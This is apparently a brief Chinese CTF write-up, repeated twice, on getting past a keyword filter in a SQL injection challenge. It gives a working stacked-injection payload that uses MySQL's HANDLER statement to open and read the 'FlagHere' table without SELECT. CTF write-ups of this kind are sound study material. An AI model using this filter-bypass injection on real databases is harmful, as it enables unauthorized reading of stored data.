题目过滤了很多东西,之前题目的利用set进行堆叠注入行不通了
但是去年看过飘零师傅的fudanctf的wp,嘻嘻,利用mysql的handler进行注入。
https://www.4hou.com/posts/mM60
11’; handler FlagHere
open as tgt
;handler tgt
read next;–
题目过滤了很多东西,之前题目的利用set进行堆叠注入行不通了
但是去年看过飘零师傅的fudanctf的wp,嘻嘻,利用mysql的handler进行注入。
https://www.4hou.com/posts/mM60
11’; handler FlagHere
open as tgt
;handler tgt
read next;–